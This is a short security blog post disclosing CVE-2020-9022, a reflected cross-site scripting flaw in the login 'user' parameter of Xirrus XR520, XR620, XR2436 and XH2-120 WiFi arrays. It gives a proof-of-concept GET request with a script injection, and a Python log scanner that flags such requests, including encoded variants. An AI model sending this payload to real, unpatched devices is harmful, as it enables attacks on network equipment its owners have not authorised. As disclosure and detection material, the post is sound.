https://sku11army.blogspot.com/2020/01/xirrus-xirrus-wifi-xss.html
### - Xirrus WiFi - XSS - (CVE-2020-9022)
[![](https://images.seebug.org/1583460215585-w331s)](https://images.seebug.org/1583460215585-w331s)
The Xirrus XR520, XR620, XR2436 and XH2-120 WiFi Array devices are vulnerable to reflected Cross-Site Scripting (XSS) at login, specifically in the **_user_** parameter.
**Affected Devices:**
- **_Xirrus XR520 WiFi Array_**
- **_Xirrus XR620 WiFi Array_**
- **_Xirrus XR2436 WiFi Array_**
- **_Xirrus XH2-120 WiFi Array_**
[![](https://images.seebug.org/1583460218923-w331s)](https://images.seebug.org/1583460218923-w331s)
The following JavaScript code is injected into the **_user_** parameter:
GET Request
https://192.x.x.x/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin**_<script>alert('XSS')</script>_**&pass=admin&click_to_login=login
[![](https://images.seebug.org/1583460221149-w331s)](https://images.seebug.org/1583460221149-w331s)
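To check whether such requests have reached a device, here is an added detection example, not code from the original post. It flags `ViewPage.cgi` login requests whose `user` parameter carries markup, including double-encoded forms. It assumes combined-format access logs from a proxy in front of the array; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Characters a login name never needs and that allow HTML/script injection.
MARKUP = re.compile(r"[<>\"'`]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2020:10:00:00 +0000] "GET /cgi-bin/ViewPage.cgi'
    '?wmi_login=1&user=admin&pass=x&click_to_login=login HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2020:10:01:00 +0000] "GET /cgi-bin/ViewPage.cgi'
    '?wmi_login=1&user=admin%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E'
    '&pass=x&click_to_login=login HTTP/1.1" 200 540',
    '198.51.100.9 - - [01/Jan/2020:10:02:00 +0000] "GET /cgi-bin/ViewPage.cgi'
    '?wmi_login=1&user=admin%253Cscript%253Ealert(1)%253C%252Fscript%253E'
    '&pass=x&click_to_login=login HTTP/1.1" 200 540',
    '198.51.100.3 - - [01/Jan/2020:10:03:00 +0000] "GET /index.html?user=%3Cb%3E HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), at most `rounds` times."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_user(line):
    """Return the decoded `user` value when the line is a ViewPage.cgi login
    request whose `user` parameter carries markup characters, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/cgi-bin/ViewPage.cgi") or "wmi_login" not in params:
        return None
    for raw in params.get("user", []):
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_user) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := suspicious_user(line))]
```

A login submitted by POST carries `user` in the request body, which access logs normally omit, so this check only sees the GET form.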
POST
[![](https://images.seebug.org/1583460223803-w331s)](https://images.seebug.org/1583460223803-w331s)
[![](https://images.seebug.org/1583460229693-w331s)](https://images.seebug.org/1583460229693-w331s)
[![](https://images.seebug.org/1583460247834-w331s)](https://images.seebug.org/1583460247834-w331s)
Shodan
[![](https://images.seebug.org/1583460256560-w331s)](https://images.seebug.org/1583460256560-w331s)
**_CVE-2020-9022_**
By: @Linuxmonr4